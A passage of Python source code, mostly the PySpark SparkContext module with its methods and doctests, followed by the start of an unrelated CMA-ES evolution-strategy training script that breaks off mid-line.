Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represent the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
auth_token = self._gateway.gateway_parameters.auth_token
self._accumulatorServer = accumulators._start_update_server(auth_token)
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port, auth_token)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
try:
filepath = os.path.join(SparkFiles.getRootDirectory(), filename)
if not os.path.exists(filepath):
# In case of YARN with shell mode, 'spark.submit.pyFiles' files are
# not added via SparkContext.addFile. Here we check if the file exists,
# try to copy and then add it to the path. See SPARK-21945.
shutil.copyfile(path, filepath)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, filepath)
except Exception:
warnings.warn(
"Failed to add file [%s] speficied in 'spark.submit.pyFiles' to "
"Python path:\n %s" % (path, "\n ".join(sys.path)),
RuntimeWarning)
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
Set a Java system property, such as spark.executor.memory. This must
must be invoked before instantiating SparkContext.
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
# readRDDFromFile eagerily reads the file so we can delete right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
.. note:: Small files are preferred, large file is also allowable, but
may cause bad performance.
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
:param path: path to sequncefile
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter:
:param valueConverter:
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
L{SparkFiles.get(fileName)<pyspark.files.SparkFiles.get>} with the
filename to find its download location.
A directory can be given if the recursive option is set to True.
Currently directories are only supported for Hadoop-supported filesystems.
>>> from pyspark import SparkFiles
>>> path = os.path.join(tempdir, "test.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("100")
>>> sc.addFile(path)
>>> def func(iterator):
... with open(SparkFiles.get("test.txt")) as testFile:
... fileVal = int(testFile.readline())
... return [x * fileVal for x in iterator]
>>> sc.parallelize([1, 2, 3, 4]).mapPartitions(func).collect()
[100, 200, 300, 400]
"""
self._jsc.sc().addFile(path, recursive)
def addPyFile(self, path):
"""
Add a .py or .zip dependency for all tasks to be executed on this
SparkContext in the future. The C{path} passed can be either a local
file, a file in HDFS (or other Hadoop-supported filesystems), or an
HTTP, HTTPS or FTP URI.
"""
self.addFile(path)
(dirname, filename) = os.path.split(path) # dirname may be directory or HDFS/S3 prefix
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
# for tests in local mode
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
if sys.version > '3':
import importlib
importlib.invalidate_caches()
def setCheckpointDir(self, dirName):
"""
Set the directory under which RDDs are going to be checkpointed. The
directory must be a HDFS path if running on a cluster.
"""
self._jsc.sc().setCheckpointDir(dirName)
def _getJavaStorageLevel(self, storageLevel):
"""
Returns a Java StorageLevel based on a pyspark.StorageLevel.
"""
if not isinstance(storageLevel, StorageLevel):
raise Exception("storageLevel must be of type pyspark.StorageLevel")
newStorageLevel = self._jvm.org.apache.spark.storage.StorageLevel
return newStorageLevel(storageLevel.useDisk,
storageLevel.useMemory,
storageLevel.useOffHeap,
storageLevel.deserialized,
storageLevel.replication)
def setJobGroup(self, groupId, description, interruptOnCancel=False):
"""
Assigns a group ID to all the jobs started by this thread until the group ID is set to a
different value or cleared.
Often, a unit of execution in an application consists of multiple Spark actions or jobs.
Application programmers can use this method to group all those jobs together and give a
group description. Once set, the Spark web UI will associate such jobs with this group.
The application can use L{SparkContext.cancelJobGroup} to cancel all
running jobs in this group.
>>> import threading
>>> from time import sleep
>>> result = "Not Set"
>>> lock = threading.Lock()
>>> def map_func(x):
... sleep(100)
... raise Exception("Task should have been cancelled")
>>> def start_job(x):
... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> supress = lock.acquire()
>>> supress = threading.Thread(target=start_job, args=(10,)).start()
>>> supress = threading.Thread(target=stop_job).start()
>>> supress = lock.acquire()
>>> print(result)
Cancelled
If interruptOnCancel is set to true for the job group, then job cancellation will result
in Thread.interrupt() being called on the job's executor threads. This is useful to help
ensure that the tasks are actually stopped in a timely manner, but is off by default due
to HDFS-1208, where HDFS may respond to Thread.interrupt() by marking nodes as dead.
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
L{setLocalProperty}
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See L{SparkContext.setJobGroup}
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
cma_es.py
|
import cma
import numpy as np
import gym
import torch.multiprocessing as mp
from torch.multiprocessing import SimpleQueue
import pickle
import sys
from model import *
from utils import *
from config import *
import time
class Worker(mp.Process):
def __init__(self, id, state_normalizer, task_q, result_q, stop, config):
mp.Process.__init__(self)
self.task_queue = task_q
self.result_q = result_q
self.evaluator = Evaluator(config, state_normalizer)
self.id = id
self.stop = stop
def run(self):
np.random.seed()
while not self.stop.value:
if self.task_queue.empty():
continue
id, solution = self.task_queue.get()
fitness, steps = self.evaluator.eval(solution)
self.result_q.put((id, fitness, steps))
def train(config):
task_queue = SimpleQueue()
result_queue = SimpleQueue()
stop = mp.Value('i', False)
stats = SharedStats(config.state_dim)
normalizers = [StaticNormalizer(config.state_dim) for _ in range(config.num_workers)]
for normalizer in normalizers:
normalizer.offline_stats.load(stats)
workers = [Worker(id, normalizers[id], task_queue, result_queue, stop, config) for id in range(config.num_workers)]
for w in workers: w.start()
opt = cma.CMAOptions()
opt['tolfun'] = -config.target
opt['popsize'] = config.pop_size
opt['verb_disp'] = 0
opt['verb_log'] = 0
opt['maxiter'] = sys.maxsize
es = cma.CMAEvolutionStrategy(config.initial_weight, config.sigma, opt)
total_steps = 0
initial_time = time.time()
training_rewards = []
training_steps = []
training_timestamps = []
test_mean, test_ste = test(config, config.initial_weight, stats)
logger.info('total steps %d, %f(%f)' % (total_steps, test_mean, test_ste))
training_rewards.append(test_mean)
training_steps.append(0)
training_timestamps.append(0)
while True:
solutions = es.ask()
for id, solution in enumerate(solutions):
task_queue.put((id, solution))
while not task_queue.empty():
continue
result = []
while len(result) < len(solutions):
if result_queue.empty():
continue
result.append(result_queue.get())
result = sorted(result, key=lambda x: x[0])
total_steps += np.sum([r[2] for r in result])
cost = [r[1] for r in result]
best_solution = solutions[np.argmin(cost)]
elapsed_time = time.time() - initial_time
test_mean, test_ste = test(config, best_solution, stats)
logger.info('total steps %d, test %f(%f), best %f, elapased time %f' %
